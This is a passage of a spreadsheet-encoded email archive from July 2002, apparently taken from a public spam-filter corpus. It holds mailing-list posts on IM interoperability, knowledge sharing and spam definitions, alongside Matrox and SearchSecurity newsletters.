experts?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URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.techcentralstation.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Dave Long &lt;dl@silcom.com&gt;\nDate: Tue, 23 Jul 2002 15:05:48 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 15:05:48 -0700</t>
  </si>
  <si>
    <t>&gt; It also strikes me that it will not be very long before livestock is &gt; genetically engineered to be dumber and meatier, and better adapted to &gt; living in industrial conditions. If we're willing to count artificial selection as genetic engineering, it has been happening since pre-literate times, and is called "domestication". -Dave &gt; "When the truck leaves Arkansas, the invoice leaves via the U.S. mail &gt; and they both arrive at about the same time," Collins says. "If our &gt; receiving clerks could sign onto the network and do an electronic &gt; handshake with the driver-you're over an item on this case, that case &gt; was damaged-we're all in agreement, and then Tyson could send a clean &gt; invoice about which there is no dispute." I can see the value to a system which guaranteed that the truck would show up with all items as ordered -- but if there's going to be spoilage anyway, I don't see how much value that "clean" invoice provides -- just think about the costs of reliable networks versus reliable protocols on unreliable ones. If the trucks are unreliable, then the sticky pads seem like the clear winner for return on IT capital investment. [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Win Treese &lt;treese@acm.org&gt;\nDate: Tue, 23 Jul 2002 14:55:45 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 14:55:45 -0400</t>
  </si>
  <si>
    <t>Win Treese &lt;treese@acm.org&gt;</t>
  </si>
  <si>
    <t>&gt; &gt; Tom said:\n&gt; &gt;\n&gt; &gt; The question then becomes, why is knowledge sharing such a difficult \n&gt; &gt; thing in organizations?\n\nAnd Owen replied:\n\n&gt; Well, IMNHO, its because companies do not reward knowledge sharers. When \n\nI don't work in this area, but I have a suspicion that many people\nsuspect projects for "knowledge management" and "knowledge sharing" as\nattempts to eliminate their jobs, or at least their importance. If "the\norganization" knows all the things I know, why does it need me?\n\nThis should actually be easy to test experimentally: compare the results\nof having someone call up and say, "Can you show us how to do X for this\nproject we're working on?" with those of having someone summoned by a\nknowledge management project to explain how to do X for the knowledge\narchives.\n\n    - Win\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Eugen Leitl &lt;eugen@leitl.org&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 23 Jul 2002 14:46:04 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 14:46:04 -0700</t>
  </si>
  <si>
    <t>Eugen Leitl wrote:\n&gt; P.S. We hate you, too.\n\n"Fuck you, sir," came the familiar tired chorus.\n\n"Louder!"\n\n"FUCK YOU, SIR!"\n\nDamn, I love that book (_Forever War_).\n\n- Joe\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: mgi_englishlist@matrox.com\nFrom: Matrox In-the-Loop newsletter &lt;newsletter@matrox.com&gt;\nDate: Tue, 23 Jul 2002 14:37:05 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 14:37:05 -0400</t>
  </si>
  <si>
    <t>Matrox In-the-Loop newsletter &lt;newsletter@matrox.com&gt;</t>
  </si>
  <si>
    <t>mgi_englishlist@matrox.com</t>
  </si>
  <si>
    <t>=?iso-8859-1?Q?Matrox_Parhelia=99_now_available?=</t>
  </si>
  <si>
    <t>--=====================_22773175==_.ALT Content-Type: text/plain; charset="us-ascii"; format=flowed Matrox Parhelia - available now! The Matrox Parhelia graphics board is now available for purchase. Visit the  Buy Matrox section of our Web site for a complete list of locations where  Matrox products are available: [URL]http://www.matrox.com[/URL] Immerse yourself in a high-fidelity underwater world with the Matrox  Parhelia Reef Demo Developed in-house by Matrox, the Matrox Reef Demo showcases the quality,  realism and complex rendering power of the Parhelia-512 and includes more  than 50 realistic underwater denizens rendered simultaneously. While you  can't get the full effect of the demo without having your very own Matrox  graphics board based on the Parhelia-512 GPU, we have put together a few  pre-rendered avi versions for you to download. Click here for more: [URL]http://www.matrox.com[/URL] New Matrox Parhelia wallpapers Decorate your desktop with the Matrox Parhelia! Choose from images of the  Parhelia logo, the Immerse yourself in High Fidelity Graphics grid, and  numerous screenshots from the spectacular Parhelia Reef Demo! Download your  favorite shot now  click here: [URL]http://www.matrox.com[/URL] New Matrox Parhelia screensaver We also have a new Matrox Parhelia screensaver - download it here: [URL]http://www.matrox.com[/URL] Parhelia-512 previews and reviews The press is talking - check out the latest Matrox Parhelia previews and  reviews here: [URL]http://www.matrox.com[/URL] Have a great day! Matrox Graphics Web Team *************************************************************************** Please send your comments about this newsletter to:  newsletter@matrox.com To unsubscribe, please visit: [URL]http://www.matrox.com[/URL] To change your e-mail address or make changes to your profile, please visit: [URL]http://www.matrox.com[/URL] *************************************************************************** --=====================_22773175==_.ALT Content-Type: text/html; charset="us-ascii" Matrox Parhelia - available now! The Matrox Parhelia graphics board is now available for purchase. Visit the Buy Matrox section of our Web site for a complete list of locations where Matrox products are available: [URL]http://www.matrox.com[/URL] Immerse yourself in a high-fidelity underwater world with the Matrox Parhelia Reef Demo Developed in-house by Matrox, the Matrox Reef Demo showcases the quality, realism and complex rendering power of the Parhelia-512 and includes more than 50 realistic underwater denizens rendered simultaneously. While you can't get the full effect of the demo without having your very own Matrox graphics board based on the Parhelia-512 GPU, we have put together a few pre-rendered avi versions for you to download. Click here for more: [URL]http://www.matrox.com[/URL] New Matrox Parhelia wallpapers Decorate your desktop with the Matrox Parhelia! Choose from images of the Parhelia logo, the Immerse yourself in High Fidelity Graphics grid, and numerous screenshots from the spectacular Parhelia Reef Demo! Download your favorite shot nowÂ  click here: [URL]http://www.matrox.com[/URL] New Matrox Parhelia screensaver We also have a new Matrox Parhelia screensaver - download it here: [URL]http://www.matrox.com[/URL] Parhelia-512 previews and reviews The press is talking - check out the latest Matrox Parhelia previews and reviews here: [URL]http://www.matrox.com[/URL] Have a great day! Matrox Graphics Web Team *************************************************************************** Please send your comments about this newsletter to: newsletter@matrox.com To unsubscribe, please visit: [URL]http://www.matrox.com[/URL] To change your e-mail address or make changes to your profile, please visit: [URL]http://www.matrox.com[/URL] *************************************************************************** --=====================_22773175==_.ALT--</t>
  </si>
  <si>
    <t>http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com http://www.matrox.com</t>
  </si>
  <si>
    <t>To: iiu@taint.org\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Tue, 23 Jul 2002 14:04:23 +0100</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 14:04:23 +0100</t>
  </si>
  <si>
    <t>[IIU] mailman crash on list host</t>
  </si>
  <si>
    <t>Hi all --\n\nWe had a pretty serious crash on the list host over the weekend, and it\ndestroyed all configuration data.  As a result, I've had to rebuild the\nmailing list from various other sources -- including the archives of\npast list traffic.\n\nIf you're a list subscriber, you may have received a "welcome to the list"\nmail. All well and good.  However, if you *used* to be subscribed to one \nof the lists at some point in 2002, or never were (I'm hoping that didn't\nhappen!), you may have also have received one of these.  Just go to the\nURL and click "unsubscribe", providing the password from the mail if\nnecessary.\n\nIf you're a list admin on any of the lists at lists.boxhost.net or\ntaint.org, I'd appreciate if you could take a look and make sure the\nsettings match up with what they used to be.\n\nSorry about this :(\n\n--j.\n\n-- \n'Justin Mason' =&gt; { url =&gt; '[URL]http://jmason.org[/URL]', blog =&gt; '[URL]http://taint.org[/URL]' }\n\n_______________________________________________\nIIU mailing list\nIIU@iiu.taint.org\n[URL]http://iiu.taint.org[/URL]</t>
  </si>
  <si>
    <t>http://jmason.org http://taint.org http://iiu.taint.org</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Tue, 23 Jul 2002 13:27:06 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 13:27:06 -0700</t>
  </si>
  <si>
    <t>AOL scaling back IM interoperability</t>
  </si>
  <si>
    <t>I suppose the main surprise here is that AOL is coming clean at all. After\nall, its long-running game of talking interop, and doing everything possible\nto prevent open standards in this arena, seemed to have been working fine,\nwith most end users completely oblivious to AOL's actions.\n\n[URL]http://www.quicken.com[/URL]\n0020723/ON20020723000833.htm\n\nAmerica Online Scales Back Instant-Messaging Compatibility Efforts\nUpdated: Tuesday, July 23, 2002 01:23 PM ET\n\nDow Jones Newswires\n\nNEW YORK -- America Online appears to be scaling back efforts to make its\ninstant-messaging service compatible with rival services.\n\nThe unit of AOL Time Warner Inc. (AOL, news, msgs) said in a regulatory\nfiling it is now focusing on messaging interoperability methods that are\nmore limited in scope than the kind envisioned by the Federal Communications\nCommission when it approved the AOL-Time Warner merger in January 2001.\n\nAmerica Online isn't required to make its messaging system interoperable\nwith others, but the FCC's merger approval included what it considered to be\nincentives for the company to do so. It also required AOL to file progress\nreports on its interoperability efforts every six months. The most recent\nreport, filed last week, disclosed the company's new direction.\n\nThe upshot of the strategy shift is that the instant-messaging market isn't\nmuch closer to broad-based interoperability than it was 18 months ago,\naccording to industry analysts. Unlike e-mail, users of most competing\ninstant-messaging services still can't directly trade messages. So an\nAmerica Online instant- messaging user can't communicate with a user of\nMicrosoft Corp.'s (MSFT, news, msgs) MSN Messenger, except by using\nthird-party software such as Trillian.\n\nAmerica Online, the biggest instant-messaging provider, has been criticized\nfor blocking users of rival services from gaining access to its users. The\ncompany also has been accused of dragging its feet amid industry attempts at\ninteroperability.\n\nFor its part, America Online has said it wants to protect the security of\nits users and the reliability of its system. And it points out that other\ncompanies have so far failed to agree on interoperability standards.\n\nWhen the FCC approved the AOL-Time Warner merger, it said that if America\nOnline wanted to offer video-conferencing and other advanced\ninstant-messaging features over Time Warner's cable lines, it first had to\nenable its instant- messaging users to communicate with users of rival\nservices. The intent of the condition was to prevent America Online from\nwidening its dominance of the instant-messaging market by exploiting its\naccess to Time Warner cable systems.\n\nAOL hasn't yet introduced video features, even though rivals Microsoft and\nYahoo Inc. (YHOO, news, msgs) did so last year.\n\nSpecifically, the FCC said America Online would have to implement a\ntechnology known as "server-to-server interoperability" before it could\noffer video. The technology would allow users of non-America Online services\nto detect when AOL users are online, and to trade messages. It would do so\nvia communications between the computer servers operated by each messaging\nprovider, using a common language.\n\nBut in the progress report filed with the FCC last week, America Online said\nit will "focus its efforts" on alternatives to server-to-server\ninteroperability. They are more limited in scope than server-to-sever.\n\nAs an example of an alternative, America Online cited a recent agreement to\nmake its instant-messaging service compatible with a new messaging service\nfrom Apple Computer Corp. (AAPL, news, msgs). The Apple service, IChat, will\nbe included in Mac OS X 10.2, the new Apple operating system set for release\nin August.\n\nIChat users will be able to talk to America Online users, but it won't\ninvolve server-to-server interoperability. Instead, the actual exchange of\nmessages will occur only on America Online's servers, even as IChat\ncustomers use Apple software.\n\n"We believe this kind of hosted IM solution provides, at least in the short\nterm, a secure, reliable and cost-effective means to provide\ninteroperability between AOL, IM and unaffiliated IM communities," Steven\nTeplitz, AOL's associate general counsel, wrote in the progress report to\nthe FCC.\n\nAs to the apparent change in strategy, company spokeswoman Kathy McKiernan\nsaid Tuesday: "It's a recognition that server-to-server has proven a hard\nnut to crack for the entire industry." Indeed, users of America Online's\nrival services can't directly communicate with each other, either.\n\nThe alternative solution "was something that we could implement now to\nprovide for IM communities to communicate," said Ms. McKiernan, adding\nAmerica Online would explore partnerships with other messaging providers,\nsimilar to the Apple deal. None has been announced so far.\n\nFCC officials couldn't be reached Tuesday.\n\nAmerica Online hasn't ruled out the possibility that it would someday\nimplement server-to-server interoperability. The company has explored the\ntechnology in the past, including a server-to-server last year with Lotus\nDevelopment, a unit of International Business Machines Corp. (IBM, news,\nmsgs).\n\nBut America Online's interoperability test with Lotus was "limited in scope\nand functionality." True server-to-server technology "would require further\nsignificant expenditures of time and resources to develop," wrote Mr.\nTeplitz.\n\nThe Internet Engineering Task Force, a group devoted to developing Internet\nstandards, has been working on a server-to-server messaging technology but\nhasn't yet developed a final version, according to America Online. Task\nforce representatives couldn't be reached.\n\nThe company's strategy shift means that true interoperability in instant\nmessaging is still a couple of years away, according to Michael Gartenberg,\nanalyst with Jupiter Research.\n\n"It's still something the market wants," he said. "At some point, it'll\nhappen, but maybe a couple of years down the road."\n\nMr. Gartenberg and other analysts believe America Online hasn't actively\npursued true interoperability because it wants to protect its large user\nbase. If messaging systems were compatible, the company could lose ground\nbecause prospective customers might see no difference in choosing another\nprovider, as long as they can reach America Online users.\n\nBut partly because of its lack of compatibility and the FCC conditions,\nAmerica Online hasn't kept up with rivals in offering new services. MSN and\nYahoo have had video-conferencing via instant-messaging since last year. AOL\nhas denied that it has held back on video messaging to avoid making its\nsystem interoperable, arguing there is little consumer demand for it.\n\nBut the new features have paid off for the company's rivals, and they are\ncatching up. Between last October and April, Microsoft's Messenger user base\nrose 32% to 29.1 million, according to ComScore Media Metrix, while Yahoo's\nbase jumped 19% to 19.2 million users. In the same period, the number of\nusers of AOL-branded messaging services increased 7% to 54.9 million.\n\n\n-Peter Loftus; Dow Jones Newswires; 201-938-5267; peter.loftus@dowjones.com\n\nCopyright 2002 Dow Jones &amp; Company, Inc.\nAll Rights Reserved\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.quicken.com http://xent.com</t>
  </si>
  <si>
    <t>To: Adam Rifkin &lt;adam@xent.com&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Tue, 23 Jul 2002 12:39:03 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 12:39:03 -0400 (EDT)</t>
  </si>
  <si>
    <t>Adam Rifkin &lt;adam@xent.com&gt;</t>
  </si>
  <si>
    <t>On Mon, 22 Jul 2002, Adam Rifkin wrote:\n\n--]By JOHN MARKOFF\n     Ahhh the ahole reporter we all love to sneer at:)-\n\n--]SAN FRANCISCO, July 21 -- In a significant challenge to Microsoft,\n--]RealNetworks plans to announce a new version of its software on Monday\n--]that can distribute audio and video in a range of formats, including\n--]Microsoft's own proprietary Windows Media.\n\nReal is more currupt that MS in so many real ways its astounding Real and\nMS CEOS dont felate each other at tech and mass media conferences.\n\nReal needs to die and die horribly. Thier biz practices alone give them an\ninstant berth in the 5th circle of hell. ALl the crap they foist on\nsystems during installation gets em free passes to all the other circles.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Marc Perkel" &lt;marc@perkel.com&gt;,\nFrom: "rODbegbie" &lt;rOD@arsecandle.org&gt;\nDate: Tue, 23 Jul 2002 12:30:08 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 12:30:08 -0400</t>
  </si>
  <si>
    <t>"Marc Perkel" &lt;marc@perkel.com&gt;,</t>
  </si>
  <si>
    <t>Marc Perkel wrote: &gt; But - MY POINT IS - catching the phrase "risk-free" in the ad portion &gt; of a non-spam is not a false positive because those lines are &gt; technically spam  No.  They.  Are.  Not. Those lines are technically *advertising*. Spam is unsolicited bulk *EMAIL*. If you do not understand this, then lease kindly STFU. Thanks, rOD. --  He gave his life for tourism. &gt;&gt; Doing the blogging thang again at [URL]http://www.groovymother.com[/URL] &lt;&lt; ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-devel mailing list Spamassassin-devel@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nDate: Tue, 23 Jul 2002 12:25:33 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 12:25:33 -0700</t>
  </si>
  <si>
    <t>On Sunday, June 30, 2002, at 12:18 AM, Rohit Khare wrote:\n&gt; You're all invited to join me for a South Bay Hi-Def spectacle at my \n&gt; apartment in Sunnyvale on the Fourth!\n\nSo here's the final report on the HD/ID party. As no less than TEN \nforkers pointed out, the invitation, while sent on Sunday 6/30, was only \ndelivered ten days later on 7/9.\n\nIt got flagged as spam.\n\nYes, on a mailing list awash in crap -- and some it is even unsolicited \ncommercial email, heavens! -- our trusty mailman filters captured and \nquarantined just two posts that week, one from me that was &gt; 100K (the \nfat articles) and one that was bcc:d (the invite).\n\nNow, it was a little difficult to recalibrate self-esteem, which as you \ncan imagine was proportional to the two-digit attendance  -- in binary!\n\nAccording to the George Washington documentary, I almost had as much \nalcohol on hand than he did -- Virginia tradition being to copiously \nlubricate each voter. Election day was a public festival day, and it \ncost poor George an average of SIXTY-FOUR shots of hard liquor PER VOTER \nthat day...\n\nSo, herewith is the prize for most appropriate flame my delayed invite \ngot:\n\n&gt; 	I unfortunately will have had other plans and thus will\n&gt; 	not be able to have made it.  Yes.\n&gt;\n&gt; 	-faisal\n\nOne of our competitors added:\n&gt; Wow - I just got this now - I guess that was KnowLate!\n\nAnd there is no prize for guessing which cold, dark forks emitted these \ntwo plaints:\n\n From Whiny Dwarf:\n&gt; Fix your mail server! just a bit late!\n\nAnd Angry Dwarf:\n&gt; God DAAAAAMMMMMNNNNN IIIIITTT! I didn't see your message until now! \n&gt; Fuck! Fuck! Fuck!\n&gt;\n&gt; We would have been there if I had seen the message before. Kuso! (as \n&gt; the Japanese would say).\n&gt;\n&gt; Fuck.\n&gt; Fuck.\n&gt; Fuck.\n&gt; Fuck.\n&gt; Fuck.\n&gt; Fuck.\n\nPerhaps I should remind the latter gently that it was not in any way his \nfault. The universe *was* out to get him!\n\nAnd finally, here's an object lesson for all ye of little faith to learn \nfrom my sins:\n\n&gt; SpamAssassin rated it spam (barely). Gotta stop\n&gt; using those "words and phrases which indicate porn" :-)\n\nYes, boys and girls, Mr. Assassin, like Mr. Lott, gets very annoyed if \nyou call the Great American Shrine a... "boob tube"\n\n:-)\n   Rohit\n\nPS. This is the obscure footnote where I actually hide the bits in this \npost. What we just encountered here is that an event-processing system \nwith a 10-day RTT cannot be used to reliably handle events more often \nthan once every 20 days. That's why I waited to reply. six bonus points \nto anyone who can prove this hunch of mine. Hint: try analyzing the \nproblem in frequency-domain.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "SearchSecurity" &lt;searchSecurity@lists.techtarget.com&gt;\nFrom: "SearchSecurity" &lt;searchSecurity-F485FCCE40B794D5@lists.techtarget.com&gt;\nDate: Tue, 23 Jul 2002 12:00:38 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 12:00:38 -0400 (EDT)</t>
  </si>
  <si>
    <t>"SearchSecurity" &lt;searchSecurity-F485FCCE40B794D5@lists.techtarget.com&gt;</t>
  </si>
  <si>
    <t>"SearchSecurity" &lt;searchSecurity@lists.techtarget.com&gt;</t>
  </si>
  <si>
    <t>Today's news: Serious PHP flaw found</t>
  </si>
  <si>
    <t>SEARCHSECURITY | Security and Industry News\nJuly 23, 2002\n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nFROM OUR SPONSOR:\n\n- FREE Security Webcast from Microsoft and NetIQ \n[URL]http://searchSecurity.com[/URL],,4619,00.htm?FreeSecurityWebcast \n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nIN THIS ISSUE | Today's Highlights\n\n1. THE TOP STORIES \n- PHP flaw could crash, burn Web servers\n- Quick Takes: Major vendors throw support at SAML\n- NetBugtraq founder's security tips\n- ROI calculators: Honest projection or fuzzy math?\n\n2. IMPORTANT ANNOUNCEMENTS AND LINKS\n- New poll: Will heuristics ever fully replace signature-based\nantivirus protection?\n- Infosec Know IT All Daily Trivia: Tuesday, July 23, 2002\n- Network Security Tip: Firewall best practices \n- Best Web Links: Risk analysis\n- The Missing Link: Scot has cyber tomb with a view\n \n____________________________________________________________________\n*********************** SPONSORED BY: NetIQ **********************\n\nFREE Security Webcast from Microsoft and NetIQ \nIs your enterprise secure? Learn how to combat hackers during the\nfree 8/20/02 Webcast, "Computer Crime Forensics," Part II of the\n"Defending the Enterprise" series. Tune in as security experts from\nthe FBI, Shell, Microsoft and NetIQ show you how to dig deep to trace\nthe steps of a hacker and preserve valuable evidence if you're ever\ncompromised. They'll also cover how to safeguard and harden your\nWindows network during a live Q&amp;A session. Discover expert\ncountermeasures to secure and protect your enterprise. Register now! \n[URL]http://searchSecurity.com[/URL],,4619,00.htm?FreeSecurityWebcast \n\n____________________________________________________________________\nLEAD STORY\n\nPHP FLAW COULD CRASH, BURN WEB SERVERS | News: SearchSecurity\nA security vulnerability in the popular PHP scripting language could\nallow an attacker to crash a Web server or run arbitrary code on a\nsystem. Only particular versions of PHP are impacted, and users are\nurged to upgrade or patch immediately. \n[URL]http://www.searchsecurity.com[/URL],289142,sid14_gci840432,00.html  \n\nMORE ON THIS TOPIC\n&gt;&gt; Read the SearchSecurity news exclusive, "Open-source security:\nIt's all in the scrutiny:"\n[URL]http://searchsecurity.techtarget.com[/URL],289142,sid14_gci811614,00.html \n\n&gt;&gt; Visit our Best Web Links on vulnerabilities:\n[URL]http://searchsecurity.techtarget.com[/URL],289521,sid14_tax281934,00.html \n\n&gt;&gt; Click here for Top 10 Articles of the Week:\n[URL]http://searchsecurity.techtarget.com[/URL],289142,sid14_gci816475,00.html    \n____________________________________________________________________\n********************************************************************\nOTHER STORIES\nIn addition to the headlines below, others are available on our news\npage.\n &gt;&gt; Full Stories: [URL]http://searchsecurity.techtarget.com[/URL]\n \nQUICK TAKES: MAJOR VENDORS THROW SUPPORT AT SAML | News:\nSearchSecurity\nRSA Security and CRM vendor ePeople announce support for the Security\nAssertion Markup Language (SAML) specification, leading off this\nedition of Quick Takes. Also included are items from Red Siren and\nVeridian, ISS and St. Bernard Software, WatchGuard and Sigaba. \n[URL]http://www.searchsecurity.com[/URL],289142,sid14_gci840356,00.html \n\nNETBUGTRAQ FOUNDER'S SECURITY TIPS | News: SearchWindowsManageability\nWhat's wrong with Windows security? How can you right those wrongs?\nSecurity expert Russ Cooper offers his insights and tips. \n[URL]http://searchwindowsmanageability.techtarget.com[/URL],289142,sid33_gci839660,00.html  \n\nROI CALCULATORS: HONEST PROJECTION OR FUZZY MATH? | News:\nSearchEBusiness\nCorporate budget watchdogs are breathing down your neck, wanting you\nto justify every technology expense. So do ROI calculators accurately\nforecast a project's likely returns or merely encourage you to open\nup your wallet and spend?\n[URL]http://searchebusiness.techtarget.com[/URL],289142,sid19_gci839773,00.html \n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nADDITIONAL SECURITY HEADLINES\nAll headlines, including those below, are available on our news page.\n &gt;&gt; Full Stories: [URL]http://searchsecurity.techtarget.com[/URL]\n\n- WHAT DOES THE FUTURE HOLD FOR PGP?\n- GAO FAULTS U.S. CYBER-SECURITY EFFORTS\n- FIREWALL SAFEGUARDS WEB-ENABLED APPS\n- SECURITY FLAWS IN PINGTEL PHONE\n\n____________________________________________________________________\nIMPORTANT FEATURES AND LINKS:\n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nTAKE OUR POLL | SearchSecurity reader survey\n\nWill heuristics ever fully replace signature-based antivirus\nprotection?\n\n[URL]http://searchsecurity.techtarget.com[/URL] \n\nPREVIOUS POLL RESULTS\n\nWhat is the weakest security link in your organization?\nPeople (138 votes) 92%\nTechnology (6 votes) 4%\nDon't know (6 votes) 4%\nTotal votes: 150\n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nINFOSEC KNOW IT ALL DAILY TRIVIA | Tuesday, July 23, 2002 \n\nThis type of IDS involves a wrapper or a scanner that looks for\nspecific events. When it sees the event, it correlates it and decides\nwhether or not it's an acceptable event.\na. anomaly detection\nb. signature-based\nc. blind barricade\nd. profile detection\n\n&gt;&gt; Check your answer:\n[URL]http://searchsecurity.techtarget.com[/URL],289483,sid14_gci840086,00.html \n\n&gt;&gt; Visit our Featured Topic on intrusion detection:\n[URL]http://searchsecurity.techtarget.com[/URL],290042,sid14_gci779273,00.html \n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nFIREWALL BEST PRACTICES | Network Security Tip\n\nFirewalls are not the end-all, be-all solution to information\nsecurity. They are, however, a necessary component of an effective\ninformation security infrastructure. The following list is a set of\nbest practices, in no particular order, that you should consider to\nensure that your firewall is configured for optimal performance and\neffectiveness...\n[URL]http://searchsecurity.techtarget.com[/URL],289483,sid14_gci838215,00.html  \n\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nRISK ANALYSIS | Best Web Links\n\nKnowing where your company's security weaknesses are allow you to\nprioritize and better allocate your resources. Learn more about risk\nanalysis from the resources we've collected here.\n[URL]http://searchsecurity.techtarget.com[/URL],289521,sid14_tax281906,00.html  \n \n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\nTHE MISSING LINK | Scot has cyber tomb with a view\n\nSometimes an epitaph just can't be the last word. Billy Kemp was a\ngreat Scot who died a couple of years ago at the young age of 52. He\nwas a councilman, husband, father and pillar of his community. His\nfamily couldn't possibly post all that on a tombstone. But they did\nmanage to fit [URL]http://www.billykemp.org.uk[/URL] on there. Yep, Kemp's\ntombstone doubles as a billboard for his Web site, created\nposthumously by his son as a tribute to his father's life. The grave\nsite has gotten more than 33,000 hits, perhaps more visits than the\ngravesite!\n\nSOURCE: vnunet\n[URL]http://www.vnunet.com[/URL] \n \n&gt;&gt; Have you missed a Missing Link? Peruse our archive: \n[URL]http://searchsecurity.techtarget.com[/URL],289521,sid14_tax292200,00.html\n\n____________________________________________________________________\n********************** SEARCHSECURITY CONTACTS *********************\n\nCATHY GAGNE, Site Editor (mailto:cgagne@techtarget.com)\n   &gt;&gt; Send in your original articles and best practices.\n____________________________________________________________________\n\nCRYSTAL FERRARO, Assistant Editor (mailto:cferraro@techtarget.com)\n   &gt;&gt; Send in your favorite Web sites.\n____________________________________________________________________\n\nMIKE MIMOSO, News Editor (mailto:mmimoso@techtarget.com)\n   &gt;&gt; Send in your news, product announcements and article ideas.\n____________________________________________________________________\n\nED HURLEY, Assistant News Editor (mailto:ehurley@techtarget.com)\n   &gt;&gt; Send in your news, product announcements and article ideas.\n____________________________________________________________________\n\nGABRIELLE DERUSSY (mailto:gderussy@techtarget.com)\n   &gt;&gt; Sponsor this or any other TechTarget newsletter.\n____________________________________________________________________\n\n____________________________________________________________________\n********************* ABOUT THIS NEWSLETTER ************************\n\nCreated by TechTarget ([URL]http://www.techtarget.com[/URL]\n TechTarget - The Most Targeted IT Media\n Copyright 2002, All Rights Reserved.\n\n\nUnsubscribe from 'Daily News'\n - Simply Reply to this Email with REMOVE within the Body or Subject\n&gt;  or\n - Go to: [URL]http://searchSecurity.techtarget.com[/URL]\n - Log in to edit your profile.\n - Click on the link to Edit email subscriptions.\n - Uncheck the box next to the newsletter you wish \n   to unsubscribe from.\n - When finished, click "Save Changes to My Profile."</t>
  </si>
  <si>
    <t>http://searchSecurity.com http://searchSecurity.com http://www.searchsecurity.com http://searchsecurity.techtarget.com http://searchsecurity.techtarget.com http://searchsecurity.techtarget.com http://searchsecurity.techtarget.com http://www.searchsecurity.com http://searchwindowsmanageability.techtarget.com http://searchebusiness.techtarget.com http://searchsecurity.techtarget.com http://searchsecurity.techtarget.com http://searchsecurity.techtarget.com http://searchsecurity.techtarget.com http://searchsecurity.techtarget.com http://searchsecurity.techtarget.com http://www.billykemp.org.uk http://www.vnunet.com http://searchsecurity.techtarget.com http://www.techtarget.com http://searchSecurity.techtarget.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Tue, 23 Jul 2002 11:50:21 +0200</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 11:50:21 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote : &gt;     I was thinkinf about an addition of another file: apt-repositories. &gt;     Stick it on apt.freshmeat.net (the center of the apt universe, IMHO) &gt;     and every time a new repository is added, the RPM can be rebuilt.  &gt;     Heck, if I could get out of my depression, I could make the whole &gt;     submission process automated....even making the RPM... Well, I already keep a list of known apt repositories on [URL]http://freshrpms.net[/URL] although I haven't added the ones that were talked about lately (actually I've been very busy over the week-end and I'm sick right now...). You could make the whole submission automated, even making the rpm? [URL]http://rpmforge.net[/URL] needs *you*! Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://freshrpms.net http://rpmforge.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Tue, 23 Jul 2002 11:16:24 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 11:16:24 -0700</t>
  </si>
  <si>
